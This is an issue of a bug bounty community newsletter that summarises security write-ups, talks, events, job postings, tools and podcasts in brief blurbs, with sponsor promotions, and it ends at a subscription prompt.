🐝 Hive Five 67 – The more you know

Hi friends,

Greetings from the hive!

I hope you had a great weekend. It's getting significantly warmer over here, so it's time to stash the winter clothes.

I finished watching the show Severance on Apple TV. Amazing! Check it out if you haven't already.

My question for you is, do you have a 30-for-30 plan? Let me know if you do!

Let's take this week by swarm!

🐝 The Bee's Knees

1. Palisade identifies Wormable Cross-Site Scripting Vulnerability affecting Rarible’s NFT Marketplace: On April 14th, Palisade reported a cross-site scripting vulnerability and WAF bypass affecting the “rarible.com” domain. An attacker could inject arbitrary HTML and JavaScript on their profile page which persisted by “following the user around” as they navigated the website.

2. OffensiveCon22 - Mark Dowd- Keynote -How Do You Actually Find Bugs?: Mark Dowd is an expert in application security, specializing primarily in low level Operating System flaws for desktop and mobile platforms.

3. Introduction to Z-winK University: The Z-winK University is back! The goal is to teach how to be successful in bug bounty with tons of bug bounty tips.

4. Psychic Signatures in Java: The long-running BBC sci-fi show Doctor Who has a recurring plot device where the Doctor manages to get out of trouble by showing an identity card which is actually completely blank.

5. The More You Know, The More You Know You Don’t Know: This is their third annual year in review of 0-days exploited in-the-wild. Each year they’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what they think the trends and takeaways are.

🙏🏻 Support the Hive

• Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

• TCM Security Academy - courses, bundles, gift certs, and access passes. Cybersecurity Training That Doesn't Break the Bank. Don't overspend on your education!

• Privacy.com - Protect Yourself Online. Create virtual cards, set a spend limit on each transaction, and track your spend. Take back control of your payments.

Become a sponsor

🔥 Buzzworthy

✅ Changelog

1. gau v2.1.1 - speed improvement: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.

📅 Events

1. Bugcrowd's 8th LevelUp will be held on may 21st: Our goal with LevelUp is to provide education, exposure, and uplift across the global security community for researchers of all experience levels.

2. hardwear.io Security Trainings and Conference USA 2022 - 6th - 10th June 2022.

3. NahamCon 2022 speakers - April 30th: Excited to announce this year's NahamCon2022 speakers: @Jhaddix @zseano @infosec_au @samwcyo @codingo_ @InsecureNature @farah_hawaa @hakluke @areyou1or0 @seanyeoh & @devec0 @adrianhetman @gregxsunday Hosted by @stokfredrik & @_JohnHammond.

4. Tool Talks - Deep Dive Technical Webcast on ripgen Tool - May 11th: As attack surfaces continue to expand at an immeasurable rate, so do subdomain takeovers.

5. Diving Deeper into Subdomain Takeovers & Mitigations with Shubham Shah - April 29th: They’ll be diving into different types of infrastructure takeovers, with a focus on subdomain takeovers, and how they can be leveraged by attackers and bounty hunters to create real security impact.

🎉 Celebrate

1. dade got promoted: Congrats!

2. Mustafa worked on an interesting project: Awesome!

3. d0nut will be speaking at LocoMocoSec: Woot!

4. Sick.Codes received a bounty from Microsoft: Let's go!

5. MasterSEC won best collaboration at H12204: Nice one!

💰 Career Corner

1. Synack Red Team is looking for threat modelers.

2. Gillis on saving your cash: "I wanted to take a second to tell the younger folks who may be flush with cash for the first time something: SAVE YOUR CA$H. [...]"

3. Daniel on how to treat your ideas: "Forget about founding a startup. Instead become a VC for your own ideas. [...]"

4. Canva is hiring for a variety of technical roles: Including Penetration Testing / Red Team.

5. Ubisoft's Bug Bounty program is hiring a Technical Program Manager.

⚡️ From the Community

1. Darknet Diaries has a Discord server.

2. RedTeamVillage is looking for DEF CON 30 sponsors.

3. What people use to resolve domains via Mohsin.

4. Justin is asking you to share your desk setup: "Getting ready to do my long-term desk setup. Anyone wanna share their setup and what is particularly great about it?"

5. Follow along lucid's 100 days of hacking journey.

📰 Articles & Threads

1. Why using URL shorteners to share sensible URLs is a terrible idea: Great thread about the security considerations while using URL shorteners.

2. Security issues with cloudflare/odoh-server-go and the ODoH RFC draft #30: Frans has been doing some research around ODoH (Oblivious DNS Over HTTPS) and he's identified some issues with the ongoing and running project at cloudflare/odoh-server-go as well as some issues with the RFC-draft itself lacking important security considerations.

3. AWAE Course and OSWE Exam Review: This is a review of the Advanced Web Attacks and Exploitation (WEB-300) course and its OSWE exam by Offensive-Security.

4. What VPS to choose?: There are tons of cloud providers that offer different types of servers with a lot of different options.

5. Meet the Blockchain Detectives Who Track Crypto’s Hackers and Scammers.

📚 Resources

1. Semgrep rules for smart contracts: In this repository you can find semgrep rules that look for patterns of vulnerabilities in smart contracts based on actual DeFi exploits.

2. Learning Powershell tips and resources.

3. Adrian on how to make the jump from web2 to web3 hacking.

4. What to check on an Android phone with spyware via Ryan.

5. Best low-cost, self-study Burp Suite training via Jason.

🎥 Videos

1. It's been a year since GitHub education's Security Shorts aired: Make sure to check it out if you haven't already.

2. Sunday Live Recon w/ IppSec: Check out this episode of Live Recon! Hosted by @Jhaddix, @nahamsec and @stokfredrik.

3. ManoMano’s Red Team Operation - From a Click to an RCE by 0xLupin: In this presentation Roni Carta, alias Lupin will share how it was possible to gain access to one of ManoMano’s servers by finding exploiting a vulnerability through a Red Team Operation.

4. IppSec takes on HackTheBox - Backdoor.

5. The Pivot - Kicks & Chips - Deep Dive into Scalper Bots: Scalper bots are designed to automatically buy a large amount of an exclusive item such as tickets, sneakers, or GPUs, often to resell them for profit.

🎵 Audio

1. Another iOS Bug and Edge Chakra Exploitation [Binary Exploitation Podcast]: A massive 11,000 byte overflow in WatchGuard, some discussion about lock-related vulnerabilities and analysis, and a look at a ChakraCore exploit dealing with all the mitigations (ASLR, DEP, CFG, ACG,CIG).

2. The Privacy, Security, & OSINT Show #258 - Introducing UNREDACTED Magazine: This week they announce their new privacy-themed magazine and present a warning about using Telnyx.

3. Smashing Security #271 - Crypto break-in, Google blurring, and mics not muting: NetFoundry's OpenZiti is an open source, free and easy way for the world to embed zero trust networking into anything.

4. Darknet Diaries #115 - Player Cheater Developer Spy: Some video game players buy cheats to win. Let’s take a look at this game cheating industry to see who the players are. Support for this show comes from Axonius. Securing assets — whether managed, unmanaged, ephemeral, or in the cloud — is a tricky task.

5. Malicious Life - Aaron Swartz: When 24-year-old Aaron Swartz was caught scraping millions of science articles off of JSTOR, he faced up to 35 years in prison plus a fine of up to 1 million dollars. Did Aaron’s crime justify such a harsh punishment?

Get $100 to try DigitalOcean - The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

Subscribe to the Hive Five to read the rest.